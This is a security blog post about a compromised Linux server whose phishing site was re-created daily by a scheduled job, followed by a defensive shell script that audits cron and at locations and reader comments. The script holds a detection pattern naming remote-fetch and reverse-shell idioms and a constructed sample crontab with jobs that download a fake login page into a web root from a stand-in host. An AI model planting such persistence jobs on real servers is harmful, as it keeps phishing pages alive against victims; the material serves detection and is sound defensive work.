web application security lab

Phishing Cron Job

The other day I was interviewing a guy for a position with our company and we got on the topic of phishing. Normally I pretty much avoid the topic, because I was way too intimately involved with it for too long, but he brought it up so we were talking about it. Then he proceeds to tell me his personal phishing story. Inside I was shuddering, because I’ve heard exactly 1 billion personal phishing stories now, and I really didn’t need to hear another one. But then he starts telling me a story I hadn’t heard yet: the story of someone who has had his website used as a phishing site.

Unfortunately I didn’t get a lot of details out of him because I had other things to do, like make sure he was a worthwhile candidate, but I did manage to get an interesting story out of him. He had a crappy little Linux box (he didn’t say what flavor) sitting on an open network - no firewall, no nothing. He was using it to host some domains for some consulting work he did. One day he gets a call from AOL saying that he was hosting a phishing site. Sure enough, he looks at his website and indeed, he was.

He was non-technical, so he called a friend of his who was vacationing in the South Pacific at the time, and asked him to log in and find out what had happened. It was a pretty boring SQL injection attack that had gained them access. The hole was plugged, the site removed and everyone went back to their day jobs.

The next day, AOL calls him again, saying that he was indeed hosting a phishing site (again) and to please take it down posthaste. Well, he called up his friend (who I imagine was getting a little tired of taking phone calls in the middle of the night while visiting Thailand, telling him to jump out of the saddle and nerd out). Anyway, he logs in and cannot see that anyone has logged in. He checks around and finds that there is a timed function that re-creates the phishing site each day if it happens to be gone.

He didn’t tell me if it was a “cron” job or an “at” job, but that was a fairly effective tactic for re-owning a server without actually exploiting any other holes in its security. Be warned: if you are hacked into, check your cron tasks!
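The advice above is easy to follow badly: people look at their own crontab and stop. A scheduled job that re-deploys a phishing kit can live in the system crontab, a drop-in file under /etc/cron.d, another user's spool file, a periodic directory script, or the at queue. The script below is an added example, not from the original post or from anyone mentioned in it. The function names and the suspicious-pattern list are my own choices; the sample crontab is constructed for the demonstration, and the host paths it walks follow common Debian and Red Hat layouts, so adjust them for your system.

```sh
#!/bin/sh
# Added example: enumerate every place a scheduled job can hide on a Linux
# box and flag entries that look like they re-fetch or re-deploy content.
# Function names and patterns are illustrative choices, not a standard.

# Things a re-deploy job tends to contain: remote fetches, decoders,
# reverse-shell idioms, writes into web roots, dotfiles under /tmp.
SUSPICIOUS_RE='wget |curl |base64|/dev/tcp/|nc -|chmod \+x|/var/www|public_html|htdocs|/tmp/\.'

# flag_cron_lines: read crontab text on stdin; print only real job lines
# (not comments, blanks or VAR=value settings) that match the patterns.
flag_cron_lines() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' \
      | grep -v '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' \
      | grep -E "$SUSPICIOUS_RE" || true   # no match is not an error here
}

# audit_cron_locations: walk the usual scheduled-job locations and print
# "<source>: <job line>" for anything flag_cron_lines considers suspicious.
audit_cron_locations() {
    # System-wide crontab, drop-in directory and anacron table
    for f in /etc/crontab /etc/anacrontab /etc/cron.d/*; do
        [ -f "$f" ] || continue
        flag_cron_lines < "$f" | sed "s|^|$f: |"
    done
    # Per-user crontabs (Debian-style and Red Hat-style spool directories);
    # attackers often plant these under an account other than yours
    for f in /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] || continue
        flag_cron_lines < "$f" | sed "s|^|$f: |"
    done
    # Scripts dropped into the periodic directories are plain shell, so
    # grep their bodies directly instead of parsing crontab syntax
    for d in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly; do
        [ -d "$d" ] || continue
        for f in "$d"/*; do
            [ -f "$f" ] || continue
            grep -E "$SUSPICIOUS_RE" "$f" 2>/dev/null | sed "s|^|$f: |" || true
        done
    done
    # "at" jobs: atq lists the queue, at -c prints each job's script
    if command -v atq >/dev/null 2>&1; then
        atq 2>/dev/null | while read -r id rest; do
            at -c "$id" 2>/dev/null | flag_cron_lines | sed "s|^|at job $id: |"
        done
    fi
    return 0
}

# Constructed sample crontab: two benign maintenance jobs and two jobs of
# the kind described in the post, which re-create a site from elsewhere.
SAMPLE_CRONTAB='# m h dom mon dow command
SHELL=/bin/sh
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
17 * * * * cd / && run-parts --report /etc/cron.hourly
*/10 * * * * wget -q -O /var/www/html/login/index.php http://example.invalid/x.txt
@daily tar xzf /tmp/.cache.tgz -C /home/site/public_html'

# flag_sample: run the filter over the constructed sample (used for checks)
flag_sample() {
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
}

# Run the live audit only when asked, so sourcing the file is side-effect free:
#   sh cron_audit.sh --audit
case "${1:-}" in
    --audit) audit_cron_locations ;;
    *)       flag_sample ;;
esac
```

Run it as root, since other users' spool files and /etc/cron.d are usually not world-readable, and treat a clean result as "nothing matched these patterns", not as "no persistence": a job can call an innocuous-looking script whose body does the work, which is why the periodic-directory loop greps script contents too. The same logic applies to systemd timers on newer systems, which this script does not cover.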

4 Responses to “Phishing Cron Job”

  1. WhiteAcid Says:

    Clever. Did he get the job :p

  2. RSnake Says:

    He wasn’t interviewing for a security position (I don’t work in security anymore, believe it or not), or he definitely wouldn’t have gotten the job if he had been. However, I think he’ll get the job he applied for, which was on one of my peers’ teams.

    Albert Wu just sent me an interesting email, part of which was interesting to this conversation:

    I just read your blog about cron jobs and phishing; I thought that was interesting. Someone at PaineWebber set a cron job to go off and take down all its servers. Talk about disgruntled employees.

    Even more reason to check those cron tasks!

  3. id Says:

    He could have had a rootkit as well; that’s the first thing I would install… then remove any traces of being there.

    A fun hack would be to create a hidden filesystem and host off of it; if the port it was running on wasn’t important, you could run a server that is almost invisible to regular users.

  4. RSnake Says:

    Reminds me of kis http://archives.neohapsis.com/archives/sf/linux/2001-q3/0038.html

    That was pretty crazy when it first came out…